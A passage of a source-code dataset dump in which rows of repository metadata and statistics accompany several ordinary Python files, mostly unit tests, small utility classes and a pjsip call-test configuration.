| 51 | 168 | 0.593137 | 450 | 4,284 | 5.488889 | 0.186667 | 0.068016 | 0.0583 | 0.077733 | 0.763968 | 0.738866 | 0.738866 | 0.647773 | 0.598785 | 0.598785 | 0 | 0.019152 | 0.256536 | 4,284 | 83 | 169 | 51.614458 | 0.756358 | 0.010504 | 0 | 0.486842 | 1 | 0 | 0.114704 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.026316 | 0 | 0.078947 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
d72199c88ef266c08f124bdd5c04dca01a9f2791 | 172 | py | Python | tests/test_referenceless.py | notricenotsweet/GEM-metrics | 10d689891558862593cdf3ad56656bbbb6249cb8 | [
"MIT"
] | 1 | 2021-04-18T22:09:34.000Z | 2021-04-18T22:09:34.000Z | tests/test_referenceless.py | maybay21/GEM-metrics | 2693f3439547a40897bc30c2ab70e27e992883c0 | [
"MIT"
] | null | null | null | tests/test_referenceless.py | maybay21/GEM-metrics | 2693f3439547a40897bc30c2ab70e27e992883c0 | [
"MIT"
] | 1 | 2021-07-11T18:18:35.000Z | 2021-07-11T18:18:35.000Z | """Test class for metrics that don't use a reference.
"""
import unittest
class TestReferenceLessMetric(object):
pass
if __name__ == '__main__':
unittest.main()
| 15.636364 | 53 | 0.709302 | 21 | 172 | 5.428571 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.180233 | 172 | 10 | 54 | 17.2 | 0.808511 | 0.290698 | 0 | 0 | 0 | 0 | 0.069565 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.2 | 0.2 | 0 | 0.4 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 3 |
d72aeb24042579690a699fc8349cabbb11bc4187 | 1,200 | py | Python | tests/test_variables.py | msiemens/mlisp | c6d3d3593dbd1dfb53d07a35f85a67e5bafab71a | [
"Unlicense",
"MIT"
] | 2 | 2015-07-05T04:46:13.000Z | 2020-01-08T23:23:22.000Z | tests/test_variables.py | msiemens/mlisp | c6d3d3593dbd1dfb53d07a35f85a67e5bafab71a | [
"Unlicense",
"MIT"
] | null | null | null | tests/test_variables.py | msiemens/mlisp | c6d3d3593dbd1dfb53d07a35f85a67e5bafab71a | [
"Unlicense",
"MIT"
] | null | null | null | from testhelpers import *
init()
mlisp_builtins = ["+", "-", "*", "/", "%", "head", "tail", "list",
"eval", "join", "cons", "def", "=", "lambda"]
def test_qexpr():
with run('{}') as r:
assert is_qexpr(r) and is_empty(r)
with run('{1 2 3}') as r:
assert is_qexpr(r)
assert str(r) == '{1 2 3}'
for i, v in enumerate(r.values):
assert is_number(v, i + 1)
def test_define():
with run('def {x} 100') as r:
assert is_sexpr(r)
with run('x') as r:
assert is_number(r, 100)
def test_unbound():
with run('y') as r:
assert is_error(r, 'Unbound symbol: \'y\'')
def test_misc():
with run('eval (head {+ - + - * /})') as r:
assert is_func(r, lib.builtin_add)
#
with run('def {a b} 5 6') as r:
assert is_sexpr(r)
with run('+ a b') as r:
assert is_number(r, 11)
#
with run('def {arglist} {a b}') as r:
assert is_sexpr(r)
#
with run('def arglist 1 2') as r:
assert is_sexpr(r)
with run('list a b') as r:
assert is_qexpr(r)
assert is_int_list(r, [1, 2])
reset_env() # FIXME: Sometimes sigsegv?? | 20.338983 | 66 | 0.508333 | 185 | 1,200 | 3.178378 | 0.324324 | 0.154762 | 0.183673 | 0.205782 | 0.341837 | 0.341837 | 0.241497 | 0.163265 | 0 | 0 | 0 | 0.025579 | 0.315833 | 1,200 | 59 | 67 | 20.338983 | 0.690621 | 0.021667 | 0 | 0.171429 | 0 | 0 | 0.145299 | 0 | 0 | 0 | 0 | 0.016949 | 0.4 | 1 | 0.114286 | false | 0 | 0.028571 | 0 | 0.142857 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
d7430eef0f290e439183c27c713425a89bbd8241 | 11,131 | py | Python | a10_octavia/tests/unit/controller/worker/tasks/test_a10_compute_tasks.py | spencerharmon/a10-octavia | 9de5d6a415a5bcb777f087011f7755ed2db47c05 | [
"Apache-2.0"
] | 5 | 2020-03-10T16:48:55.000Z | 2021-09-18T00:57:58.000Z | a10_octavia/tests/unit/controller/worker/tasks/test_a10_compute_tasks.py | spencerharmon/a10-octavia | 9de5d6a415a5bcb777f087011f7755ed2db47c05 | [
"Apache-2.0"
] | 72 | 2019-08-10T01:16:59.000Z | 2021-12-13T08:20:36.000Z | a10_octavia/tests/unit/controller/worker/tasks/test_a10_compute_tasks.py | spencerharmon/a10-octavia | 9de5d6a415a5bcb777f087011f7755ed2db47c05 | [
"Apache-2.0"
] | 27 | 2019-08-11T19:26:52.000Z | 2021-07-21T09:08:58.000Z | # Copyright 2020, A10 Networks
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import imp
try:
from unittest import mock
except ImportError:
import mock
from oslo_config import cfg
from oslo_config import fixture as oslo_fixture
from octavia.common import constants as o_constants
from octavia.common import data_models as o_data_models
from octavia.tests.common import constants as o_test_constants
from a10_octavia.common import config_options
from a10_octavia.common import data_models
from a10_octavia.controller.worker.tasks import a10_compute_tasks as task
from a10_octavia.tests.common import a10constants
from a10_octavia.tests.unit import base
AMPHORA = o_data_models.Amphora(id=a10constants.MOCK_AMPHORA_ID)
VTHUNDER = data_models.VThunder(compute_id=a10constants.MOCK_COMPUTE_ID)
VIP = o_data_models.Vip(ip_address="1.1.1.1", network_id=o_test_constants.MOCK_VIP_NET_ID)
LB = o_data_models.LoadBalancer(
id=a10constants.MOCK_LOAD_BALANCER_ID, vip=VIP)
class TestA10ComputeTasks(base.BaseTaskTestCase):
def setUp(self):
super(TestA10ComputeTasks, self).setUp()
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
self.conf.register_opts(config_options.A10_GLM_LICENSE_OPTS,
group=a10constants.A10_GLOBAL_CONF_SECTION)
imp.reload(task)
self.client_mock = mock.Mock()
self.db_session = mock.patch(
'a10_octavia.controller.worker.tasks.a10_database_tasks.db_apis.get_session')
self.db_session.start()
def tearDown(self):
super(TestA10ComputeTasks, self).tearDown()
self.conf.reset()
@mock.patch('stevedore.driver.DriverManager.driver')
def test_ComputeCreate_execute_no_nets(self, mock_driver):
compute_task = task.ComputeCreate()
compute_task.compute = mock.MagicMock()
compute_task.execute(AMPHORA.id)
args, kwargs = compute_task.compute.build.call_args
self.assertEqual(kwargs.get('network_ids'), [])
@mock.patch('stevedore.driver.DriverManager.driver')
def test_ComputeCreate_execute_mgmt_only(self, mock_driver):
self.conf.config(group=a10constants.A10_CONTROLLER_WORKER_CONF_SECTION,
amp_mgmt_network=a10constants.MOCK_NETWORK_ID)
compute_task = task.ComputeCreate()
compute_task.compute = mock.MagicMock()
compute_task.execute(AMPHORA.id)
args, kwargs = compute_task.compute.build.call_args
self.assertEqual(kwargs.get('network_ids'), [a10constants.MOCK_NETWORK_ID])
@mock.patch('stevedore.driver.DriverManager.driver')
def test_ComputeCreate_execute_boot_only(self, mock_driver):
boot_list = [a10constants.MOCK_NETWORK_ID, 'mock-network-id-2']
self.conf.config(group=a10constants.A10_CONTROLLER_WORKER_CONF_SECTION,
amp_boot_network_list=boot_list)
compute_task = task.ComputeCreate()
compute_task.compute = mock.MagicMock()
compute_task.execute(AMPHORA.id)
args, kwargs = compute_task.compute.build.call_args
actual_net_ids = kwargs.get('network_ids')
self.assertEqual(set(boot_list), set(actual_net_ids))
self.assertEqual(len(boot_list), len(actual_net_ids))
@mock.patch('stevedore.driver.DriverManager.driver')
def test_ComputeCreate_execute_glm_only(self, mock_driver):
self.conf.config(group=a10constants.GLM_LICENSE_CONFIG_SECTION,
amp_license_network=a10constants.MOCK_NETWORK_ID)
compute_task = task.ComputeCreate()
compute_task.compute.build = mock.MagicMock()
compute_task.execute(AMPHORA.id)
args, kwargs = compute_task.compute.build.call_args
self.assertEqual(kwargs.get('network_ids'), [a10constants.MOCK_NETWORK_ID])
@mock.patch('stevedore.driver.DriverManager.driver')
def test_ComputeCreate_execute_lb_only(self, mock_driver):
compute_task = task.ComputeCreate()
compute_task.compute.build = mock.MagicMock()
compute_task.execute(AMPHORA.id, loadbalancer=LB)
args, kwargs = compute_task.compute.build.call_args
self.assertEqual(kwargs.get('network_ids'), [VIP.network_id])
@mock.patch('stevedore.driver.DriverManager.driver')
def test_ComputeCreate_execute_mgmt_is_glm(self, mock_driver):
self.conf.config(group=a10constants.A10_CONTROLLER_WORKER_CONF_SECTION,
amp_mgmt_network=a10constants.MOCK_NETWORK_ID)
self.conf.config(group=a10constants.GLM_LICENSE_CONFIG_SECTION,
amp_license_network=a10constants.MOCK_NETWORK_ID)
compute_task = task.ComputeCreate()
compute_task.compute.build = mock.MagicMock()
compute_task.execute(AMPHORA.id)
args, kwargs = compute_task.compute.build.call_args
self.assertEqual(kwargs.get('network_ids'), [a10constants.MOCK_NETWORK_ID])
@mock.patch('stevedore.driver.DriverManager.driver')
def test_ComputeCreate_execute_mgmt_is_first_boot(self, mock_driver):
mgmt_id = a10constants.MOCK_NETWORK_ID
boot_list = [mgmt_id, 'mock-network-id-2']
self.conf.config(group=a10constants.A10_CONTROLLER_WORKER_CONF_SECTION,
amp_mgmt_network=mgmt_id,
amp_boot_network_list=boot_list)
compute_task = task.ComputeCreate()
compute_task.compute = mock.MagicMock()
compute_task.execute(AMPHORA.id)
args, kwargs = compute_task.compute.build.call_args
actual_net_ids = kwargs.get('network_ids')
self.assertEqual(actual_net_ids, boot_list)
@mock.patch('stevedore.driver.DriverManager.driver')
def test_ComputeCreate_execute_mgmt_is_lb(self, mock_driver):
loadbalancer = copy.deepcopy(LB)
loadbalancer.vip.network_id = a10constants.MOCK_NETWORK_ID
self.conf.config(group=a10constants.A10_CONTROLLER_WORKER_CONF_SECTION,
amp_mgmt_network=a10constants.MOCK_NETWORK_ID)
compute_task = task.ComputeCreate()
compute_task.compute.build = mock.MagicMock()
compute_task.execute(AMPHORA.id, loadbalancer=loadbalancer)
args, kwargs = compute_task.compute.build.call_args
self.assertEqual(kwargs.get('network_ids'), [a10constants.MOCK_NETWORK_ID])
@mock.patch('stevedore.driver.DriverManager.driver')
def test_ComputeCreate_execute_glm_in_boot(self, mock_driver):
boot_list = ['mock-mgmt-net-id', a10constants.MOCK_NETWORK_ID]
self.conf.config(group=a10constants.A10_CONTROLLER_WORKER_CONF_SECTION,
amp_boot_network_list=boot_list)
self.conf.config(group=a10constants.GLM_LICENSE_CONFIG_SECTION,
amp_license_network=a10constants.MOCK_NETWORK_ID)
compute_task = task.ComputeCreate()
compute_task.compute = mock.MagicMock()
compute_task.execute(AMPHORA.id)
args, kwargs = compute_task.compute.build.call_args
actual_net_ids = kwargs.get('network_ids')
self.assertIn(a10constants.MOCK_NETWORK_ID, actual_net_ids)
self.assertEqual(len(actual_net_ids), len(boot_list))
@mock.patch('stevedore.driver.DriverManager.driver')
def test_ComputeCreate_execute_net_list_no_diff(self, mock_driver):
mgmt_id = 'mock-mgmt-net-id'
license_id = 'mock-mock-license-net-id'
boot_list = ['mock-data-net-id-1']
net_list = [mgmt_id, boot_list[0], LB.vip.network_id, license_id]
self.conf.config(group=a10constants.A10_CONTROLLER_WORKER_CONF_SECTION,
amp_mgmt_network=mgmt_id,
amp_boot_network_list=boot_list)
self.conf.config(group=a10constants.GLM_LICENSE_CONFIG_SECTION,
amp_license_network=license_id)
compute_task = task.ComputeCreate()
compute_task.compute = mock.MagicMock()
compute_task.execute(AMPHORA.id, loadbalancer=LB, network_list=net_list)
args, kwargs = compute_task.compute.build.call_args
actual_net_ids = kwargs.get('network_ids')
self.assertEqual(actual_net_ids[0], mgmt_id)
self.assertEqual(set(actual_net_ids), set(net_list))
self.assertEqual(len(actual_net_ids), len(net_list))
@mock.patch('stevedore.driver.DriverManager.driver')
def test_ComputeCreate_execute_net_list_with_diff(self, mock_driver):
mgmt_id = 'mock-mgmt-net-id'
license_id = 'mock-mock-license-net-id'
boot_list = ['mock-data-net-id-1', 'mock-data-net-id-2']
net_list = [mgmt_id, boot_list[0], license_id]
self.conf.config(group=a10constants.A10_CONTROLLER_WORKER_CONF_SECTION,
amp_mgmt_network=mgmt_id,
amp_boot_network_list=boot_list)
self.conf.config(group=a10constants.GLM_LICENSE_CONFIG_SECTION,
amp_license_network=license_id)
compute_task = task.ComputeCreate()
compute_task.compute = mock.MagicMock()
compute_task.execute(AMPHORA.id, loadbalancer=LB, network_list=net_list)
args, kwargs = compute_task.compute.build.call_args
actual_net_ids = kwargs.get('network_ids')
expected_net_ids = {mgmt_id, license_id, LB.vip.network_id}.union(boot_list)
self.assertEqual(actual_net_ids[0], mgmt_id)
self.assertNotEqual(set(actual_net_ids), set(net_list))
self.assertNotEqual(len(actual_net_ids), len(net_list))
self.assertEqual(set(actual_net_ids), expected_net_ids)
self.assertEqual(len(actual_net_ids), len(expected_net_ids))
@mock.patch('stevedore.driver.DriverManager.driver')
def test_CheckAmphoraStatus_execute_status_active(self, mock_driver):
vthunder = copy.deepcopy(VTHUNDER)
_amphora_mock = mock.MagicMock()
_amphora_mock.status = o_constants.ACTIVE
mock_driver.get_amphora.return_value = _amphora_mock, None
computestatus = task.CheckAmphoraStatus()
status = computestatus.execute(vthunder)
self.assertEqual(status, True)
@mock.patch('stevedore.driver.DriverManager.driver')
def test_CheckAmphoraStatus_status_execute_shutoff(self, mock_driver):
vthunder = copy.deepcopy(VTHUNDER)
_amphora_mock = mock.MagicMock()
_amphora_mock.status = "SHUTOFF"
mock_driver.get_amphora.return_value = _amphora_mock, None
computestatus = task.CheckAmphoraStatus()
status = computestatus.execute(vthunder)
self.assertEqual(status, False)
| 47.165254 | 90 | 0.715749 | 1,397 | 11,131 | 5.400859 | 0.120974 | 0.064148 | 0.052485 | 0.045726 | 0.761166 | 0.719682 | 0.709476 | 0.69609 | 0.688403 | 0.656991 | 0 | 0.014581 | 0.192885 | 11,131 | 235 | 91 | 47.365957 | 0.825245 | 0.051927 | 0 | 0.582888 | 0 | 0 | 0.082954 | 0.057232 | 0 | 0 | 0 | 0 | 0.112299 | 1 | 0.080214 | false | 0 | 0.080214 | 0 | 0.165775 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
d7509c4cd50a2e3c40de876c849306de353c8796 | 1,617 | py | Python | tb/sources/review_list.py | DronMDF/manabot | b412e8cb9b5247f05487bed4cbf4967f7b58327f | [
"MIT"
] | 1 | 2017-11-29T11:51:12.000Z | 2017-11-29T11:51:12.000Z | tb/sources/review_list.py | DronMDF/manabot | b412e8cb9b5247f05487bed4cbf4967f7b58327f | [
"MIT"
] | 109 | 2017-11-28T20:51:59.000Z | 2018-02-02T13:15:29.000Z | tb/sources/review_list.py | DronMDF/manabot | b412e8cb9b5247f05487bed4cbf4967f7b58327f | [
"MIT"
] | null | null | null | from .review import Review, UpdateableReview
class ReviewUnderControl:
def __init__(self, db):
self.db = db
def __iter__(self):
return (Review(r) for r in self.db.all())
class ReviewIds:
def __init__(self, reviews):
self.reviews = reviews
def __iter__(self):
return (i['id'] for i in self.reviews)
class ReviewVerified:
def __init__(self, reviews):
self.reviews = reviews
def __iter__(self):
return (r for r in self.reviews if r['verify'])
class ReviewIgnored:
def __init__(self, reviews):
self.reviews = reviews
def __iter__(self):
return (r for r in self.reviews if r['status'] == 'ignore')
class ReviewOne:
def __init__(self, reviews):
self.reviews = reviews
def __iter__(self):
return iter([next(iter(self.reviews))])
class ReviewIsNeed:
def __init__(self, current, reviews):
self.current = current
self.reviews = reviews
def __iter__(self):
# Если в current что-то есть - новые не нужны
return iter([] if list(self.current) else self.reviews)
class ReviewDifference:
def __init__(self, reviews, others):
self.reviews = reviews
self.others = others
def __iter__(self):
others_id = {r['id'] for r in self.others}
return (r for r in self.reviews if r['id'] not in others_id)
class ReviewForUpdate:
def __init__(self, extern, exists):
self.extern = extern
self.exists = exists
def updateable(self):
exists_id = {r['id']: r for r in self.exists}
return (
UpdateableReview(exists_id[r['id']], r)
for r in self.extern
if r['id'] in exists_id
)
def __iter__(self):
return (r for r in self.updateable() if r.needUpdate())
| 20.468354 | 62 | 0.698207 | 239 | 1,617 | 4.435146 | 0.200837 | 0.176415 | 0.083019 | 0.075472 | 0.370755 | 0.360377 | 0.333019 | 0.333019 | 0.333019 | 0.239623 | 0 | 0 | 0.1812 | 1,617 | 78 | 63 | 20.730769 | 0.800604 | 0.026592 | 0 | 0.346154 | 0 | 0 | 0.019084 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.326923 | false | 0 | 0.019231 | 0.134615 | 0.673077 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 3 |
d76ffeea7a15f6cc88a78023f7f989729b0cc99f | 590 | py | Python | finance/admin.py | webclinic017/invertimo | 125995b2f04a0b8cf3fe98df38f2a4f15cf8399b | [
"MIT"
] | null | null | null | finance/admin.py | webclinic017/invertimo | 125995b2f04a0b8cf3fe98df38f2a4f15cf8399b | [
"MIT"
] | null | null | null | finance/admin.py | webclinic017/invertimo | 125995b2f04a0b8cf3fe98df38f2a4f15cf8399b | [
"MIT"
] | null | null | null | from django.contrib import admin
from .models import (
Account,
AccountEvent,
Exchange,
ExchangeIdentifier,
Position,
Asset,
Transaction,
TransactionImport,
TransactionImportRecord,
EventImportRecord,
)
admin.site.register(Account)
admin.site.register(AccountEvent)
admin.site.register(Exchange)
admin.site.register(ExchangeIdentifier)
admin.site.register(Position)
admin.site.register(Asset)
admin.site.register(Transaction)
admin.site.register(TransactionImport)
admin.site.register(TransactionImportRecord)
admin.site.register(EventImportRecord) | 23.6 | 44 | 0.789831 | 58 | 590 | 8.034483 | 0.310345 | 0.193133 | 0.364807 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.118644 | 590 | 25 | 45 | 23.6 | 0.896154 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.347826 | 0 | 0.347826 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
d77337fd84c4c07ea01cd56645d3106d6df8a173 | 995 | py | Python | Calculator/calculator.py | harshalupadhye/statistic | 33d9fa183e6268f97c2394d8134f1e3fc2efc2c0 | [
"MIT"
] | null | null | null | Calculator/calculator.py | harshalupadhye/statistic | 33d9fa183e6268f97c2394d8134f1e3fc2efc2c0 | [
"MIT"
] | null | null | null | Calculator/calculator.py | harshalupadhye/statistic | 33d9fa183e6268f97c2394d8134f1e3fc2efc2c0 | [
"MIT"
] | 1 | 2019-11-17T04:15:50.000Z | 2019-11-17T04:15:50.000Z | from Calculator.addition import addition
from Calculator.subtraction import subtraction
from Calculator.multiplication import multiplication
from Calculator.division import division
from Calculator.square import square
from Calculator.squareroot import squareroot
class Calculator:
result = 0
def __init__(self):
pass
def add(self, a, b):
self.result = addition(a, b)
return self.result
def subtract(self, a, b):
self.result = subtraction(a, b)
return self.result
def multiply(self, a, b):
self.result = multiplication(a, b)
return self.result
def divide(self, a, b):
self.result = division(a, b)
return round(float(self.result), 7)
def squaring(self, a):
self.result = square(a)
return self.result
def square_rt(self, a):
self.result = squareroot(a)
return round(float(self.result), 7)
def variance_sample_proportion(self, my_pop):
pass | 24.875 | 52 | 0.660302 | 127 | 995 | 5.110236 | 0.259843 | 0.1849 | 0.03698 | 0.061633 | 0.288136 | 0.189522 | 0.09245 | 0 | 0 | 0 | 0 | 0.004032 | 0.252261 | 995 | 40 | 53 | 24.875 | 0.86828 | 0 | 0 | 0.266667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.266667 | false | 0.066667 | 0.2 | 0 | 0.733333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 3 |
d773f97269fd60411607bf463a80a62ce933da50 | 459 | py | Python | platform_disk_api/utils.py | neuro-inc/platform-disk-api | ccba10ac99032a59d456b559a2f1d22e5787c52b | [
"Apache-2.0"
] | null | null | null | platform_disk_api/utils.py | neuro-inc/platform-disk-api | ccba10ac99032a59d456b559a2f1d22e5787c52b | [
"Apache-2.0"
] | 6 | 2022-01-17T03:11:20.000Z | 2022-03-25T03:17:47.000Z | platform_disk_api/utils.py | neuro-inc/platform-disk-api | ccba10ac99032a59d456b559a2f1d22e5787c52b | [
"Apache-2.0"
] | null | null | null | from datetime import datetime, timedelta, timezone
def utc_now() -> datetime:
return datetime.now(timezone.utc)
def datetime_dump(dt: datetime) -> str:
return str(dt.timestamp())
def datetime_load(raw: str) -> datetime:
return datetime.fromtimestamp(float(raw), timezone.utc)
def timedelta_dump(td: timedelta) -> str:
return str(td.total_seconds())
def timedelta_load(raw: str) -> timedelta:
return timedelta(seconds=float(raw))
| 20.863636 | 59 | 0.721133 | 60 | 459 | 5.416667 | 0.333333 | 0.086154 | 0.135385 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.154684 | 459 | 21 | 60 | 21.857143 | 0.837629 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.454545 | false | 0 | 0.090909 | 0.454545 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 3 |
d784141a178bcf68f4981b370e10b1ab73e229b3 | 67 | py | Python | python/testData/codeInsight/mlcompletion/sameColumnKeywords1.py | tgodzik/intellij-community | f5ef4191fc30b69db945633951fb160c1cfb7b6f | [
"Apache-2.0"
] | 2 | 2019-04-28T07:48:50.000Z | 2020-12-11T14:18:08.000Z | python/testData/codeInsight/mlcompletion/sameColumnKeywords1.py | tgodzik/intellij-community | f5ef4191fc30b69db945633951fb160c1cfb7b6f | [
"Apache-2.0"
] | 2 | 2022-02-19T09:45:05.000Z | 2022-02-27T20:32:55.000Z | python/testData/codeInsight/mlcompletion/sameColumnKeywords1.py | tgodzik/intellij-community | f5ef4191fc30b69db945633951fb160c1cfb7b6f | [
"Apache-2.0"
] | 2 | 2020-03-15T08:57:37.000Z | 2020-04-07T04:48:14.000Z | a, b = 2, 3
if a > b:
print(a)
elif a * 2 > b:
print(b)
<caret> | 11.166667 | 15 | 0.477612 | 16 | 67 | 2 | 0.5 | 0.125 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.065217 | 0.313433 | 67 | 6 | 16 | 11.166667 | 0.630435 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.333333 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
d78992c8ec504fe49a791b1a16ea4fc7df9cbd5d | 1,058 | py | Python | pjsip/tests/pjsua/scripts-call/301_ice_public_b.py | tomorrow-rain/pjsip | 776e032c4ee2672cd42b8c665021b1310181d126 | [
"MIT"
] | null | null | null | pjsip/tests/pjsua/scripts-call/301_ice_public_b.py | tomorrow-rain/pjsip | 776e032c4ee2672cd42b8c665021b1310181d126 | [
"MIT"
] | null | null | null | pjsip/tests/pjsua/scripts-call/301_ice_public_b.py | tomorrow-rain/pjsip | 776e032c4ee2672cd42b8c665021b1310181d126 | [
"MIT"
] | null | null | null | # $Id$
#
from inc_cfg import *
# This test:
# to make call with ICE but without STUN.
# Note:
# - need --dis-codec to make INVITE packet less than typical MTU
uas_args = "--null-audio --id=\"<sip:test1@pjsip.org>\" --registrar=sip:sip.pjsip.org --username=test1 --password=test1 --realm=pjsip.org --proxy=\"sip:sip.pjsip.org;lr\" --rtp-port 0 --use-ice --use-compact-form --max-calls 1 --dis-codec=i --dis-codec=s --dis-codec=g --log-file callee.log"
uac_args = "--null-audio --id=\"<sip:test2@pjsip.org>\" --registrar=sip:sip.pjsip.org --username=test2 --password=test2 --realm=pjsip.org --proxy=\"sip:sip.pjsip.org;lr\" --rtp-port 0 --use-ice --use-compact-form --max-calls 1 --dis-codec=i --dis-codec=s --dis-codec=g --log-file caller.log"
test_param = TestParam(
"ICE via public internet with no STUN",
[
InstanceParam( "callee", uas_args,
uri="<sip:test1@pjsip.org>",
have_reg=True, have_publish=False),
InstanceParam( "caller", uac_args,
uri="<sip:test2@pjsip.org>",
have_reg=True, have_publish=False),
]
)
| 40.692308 | 294 | 0.666352 | 169 | 1,058 | 4.112426 | 0.414201 | 0.115108 | 0.063309 | 0.080576 | 0.566906 | 0.515108 | 0.515108 | 0.515108 | 0.302158 | 0.302158 | 0 | 0.013115 | 0.135161 | 1,058 | 25 | 295 | 42.32 | 0.746448 | 0.119093 | 0 | 0.142857 | 0 | 0.285714 | 0.600649 | 0.108225 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.142857 | 0.071429 | 0 | 0.071429 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 3 |
ad2b7d7e1f92e87ee35dd4bcf57b7d783c28c486 | 2,674 | py | Python | stage/configuration/test_kudu_destination.py | Sentienz/datacollector-tests | ca27988351dc3366488098b5db6c85a8be2f7b85 | [
"Apache-2.0"
] | null | null | null | stage/configuration/test_kudu_destination.py | Sentienz/datacollector-tests | ca27988351dc3366488098b5db6c85a8be2f7b85 | [
"Apache-2.0"
] | 1 | 2019-04-24T11:06:38.000Z | 2019-04-24T11:06:38.000Z | stage/configuration/test_kudu_destination.py | anubandhan/datacollector-tests | 301c024c66d68353735256b262b681dd05ba16cc | [
"Apache-2.0"
] | 2 | 2019-05-24T06:34:37.000Z | 2020-03-30T11:48:18.000Z | import pytest
from streamsets.testframework.decorators import stub
@stub
def test_admin_operation_timeout_in_milliseconds(sdc_builder, sdc_executor):
pass
@stub
@pytest.mark.parametrize('stage_attributes', [{'change_log_format': 'MSSQL'},
{'change_log_format': 'MongoDBOpLog'},
{'change_log_format': 'MySQLBinLog'},
{'change_log_format': 'NONE'},
{'change_log_format': 'OracleCDC'}])
def test_change_log_format(sdc_builder, sdc_executor, stage_attributes):
pass
@stub
@pytest.mark.parametrize('stage_attributes', [{'default_operation': 'DELETE'},
{'default_operation': 'INSERT'},
{'default_operation': 'UPDATE'},
{'default_operation': 'UPSERT'}])
def test_default_operation(sdc_builder, sdc_executor, stage_attributes):
pass
@stub
@pytest.mark.parametrize('stage_attributes', [{'external_consistency': 'CLIENT_PROPAGATED'},
{'external_consistency': 'COMMIT_WAIT'}])
def test_external_consistency(sdc_builder, sdc_executor, stage_attributes):
pass
@stub
def test_field_to_column_mapping(sdc_builder, sdc_executor):
pass
@stub
def test_kudu_masters(sdc_builder, sdc_executor):
pass
@stub
def test_maximum_number_of_worker_threads(sdc_builder, sdc_executor):
pass
@stub
def test_mutation_buffer_space_in_records(sdc_builder, sdc_executor):
pass
@stub
